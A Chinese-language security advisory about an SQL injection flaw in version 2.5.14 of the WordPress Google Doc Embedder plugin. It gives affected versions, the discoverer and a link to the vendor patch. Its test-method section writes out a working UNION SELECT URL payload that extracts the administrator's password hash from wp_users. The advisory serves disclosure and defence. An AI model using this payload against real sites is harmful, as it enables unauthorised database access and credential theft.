当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

WordPress Google Doc Embedder插件\'google-document-embedder

     发表日期:2014-12-05 10:06:01

WordPress Google Doc Embedder插件\'google-document-embedder\\view.php\' SQL注入

BugTraq-ID:71304

发布日期:2014-11-11

更新日期:2014-11-27

受影响系统:

WordPress Google Doc Embedder 2.5.14

WordPress Google Doc Embedder

详细信息:

Google Doc Embedder插件可将PDF、MS Office及其他文件类型嵌入到网页中。 Google Doc Embedder Plugin 2.5.14及其他版本在实现上存在sql注入漏洞,成功利用后可使攻击者执行未授权数据库操作。

来源:

Kacper Szurek

测试方法:

警告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com /wp-content/plugins/google-document-embedder/view.php?embedded=1&gpid=0 UNION SELECT 1, 2, 3, CONCAT(CAST(CHAR(97, 58, 49, 58, 123, 115, 58, 54, 58, 34, 118, 119, 95, 99, 115, 115, 34, 59, 115, 58) as CHAR), LENGTH(user_pass), CAST(CHAR(58, 34) as CHAR), user_pass, CAST(CHAR(34, 59, 125) as CHAR)) FROM `wp_users` WHERE ID=1

解决办法:

厂商补丁:

WordPress

---------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://wordpress.org/extend/plugins/google-document-embedder/